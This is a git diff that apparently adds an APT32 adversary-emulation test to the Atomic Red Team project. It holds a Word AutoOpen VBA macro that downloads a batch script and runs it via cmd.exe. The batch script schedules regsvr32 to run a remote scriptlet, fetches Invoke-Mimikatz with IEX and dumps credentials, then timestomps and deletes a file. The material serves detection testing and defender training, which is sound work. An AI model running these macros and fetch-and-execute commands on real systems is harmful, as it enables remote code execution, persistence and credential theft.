diff --git a/ARTifacts/Adversary/APT32/APT32.md b/ARTifacts/Adversary/APT32/APT32.md new file mode 100644 index 00000000..d8be2405 --- /dev/null +++ b/ARTifacts/Adversary/APT32/APT32.md @@ -0,0 +1,3 @@ +### Group: APT32, OceanLotus Group +[APT32](https://attack.mitre.org/wiki/Group/G0050) + diff --git a/ARTifacts/Adversary/APT32/APT32.vba b/ARTifacts/Adversary/APT32/APT32.vba new file mode 100644 index 00000000..c1e5be88 --- /dev/null +++ b/ARTifacts/Adversary/APT32/APT32.vba @@ -0,0 +1,48 @@ +' Save Document As Single Web Page .mht +' Rename Document As .Doc +' This Document is modeled after FireEye's report on APT32 +' Special Thanks to Nick Carr for his work on this write-ip +' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html + +Sub AutoOpen() + +Dim myURL As String +Dim myPath As String + + +If (MsgBox("You're Are About To Execute the ATOMIC Test for APT32, You sure?", 1, vbMsgBoxSetForeground) = 2) Then + End ' This Ends Macro +End If + +' Downloads APT32 Chain Reaction Script +myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat" + +Dim WinHttpReq As Object +Set WinHttpReq = CreateObject("Microsoft.XMLHTTP") +WinHttpReq.Open "GET", myURL, False, "username", "password" +WinHttpReq.send + +myURL = WinHttpReq.responseBody +If WinHttpReq.Status = 200 Then + Set oStream = CreateObject("ADODB.Stream") + oStream.Open + oStream.Type = 1 + oStream.Write WinHttpReq.responseBody + + Dim fso As Object + Const FLDR_NAME As String = "C:\Tools\" + + Set fso = CreateObject("Scripting.FileSystemObject") + + If Not fso.FolderExists(FLDR_NAME) Then + fso.CreateFolder (FLDR_NAME) + End If + + ' Change Path HERE + oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite + ' EXECUTE FROM PATH + Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat" + oStream.Close +End If + +End Sub diff --git a/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat b/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat new file mode 100644 index 00000000..201697c5 --- /dev/null +++ b/ARTifacts/Chain_Reactions/chain_reaction_apt32.bat @@ -0,0 +1,32 @@ +:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050 +:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html +:: Thanks to Nick Carr for his research on this group +:: Sample Representation of ATT&CK Techniques used by APT32 +:: Tactics: Execution, Persistence, Privilege Escalation + + +:: Tactic: Privilege Escalation / Execution +:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053 +:: Create Scheduled Task With RegSv32 Payload + +SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30 + +SCHTASKS /Delete /TN "Atomic Testing" /F + +:: Tactics: Execution +:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086 + +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +:: Tactics: Defense Evasion +:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099 +:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c + +echo "Atomic Test File" > test.txt +PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} + +:: Tactics: Defense Evasion +:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107 + +:: Deletes File, detection here would be File Modificaiton +del test.txt diff --git a/Windows/Defense Evasion/Timestomp.md b/Windows/Defense Evasion/Timestomp.md new file mode 100644 index 00000000..31a4144f --- /dev/null +++ b/Windows/Defense Evasion/Timestomp.md @@ -0,0 +1,10 @@ +# Timestomp + +MITRE ATT&CK Technique: [T1099](https://attack.mitre.org/wiki/Technique/T1099) + +## Timestomp with PowerShell + + #### Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c + + echo "Atomic Test File" > test.txt + PowerShell.exe -com {$file=(gi test.txt);$date='06/06/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date} diff --git a/Windows/README.md b/Windows/README.md index 0dc5ca85..b4412191 100644 --- a/Windows/README.md +++ b/Windows/README.md @@ -35,6 +35,6 @@ | Winlogon Helper DLL | | [Rundll32](Execution/Rundll32.md) | | | | | | | | | | | Scripting | | | | | | | | | | | Software Packing | | | | | | | | -| | | Timestomp | | | | | | | | +| | | [Timestomp](Defense%20Evasion/Timestomp.md | | | | | | | | | | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | | | | | Valid Accounts | | | | | | | |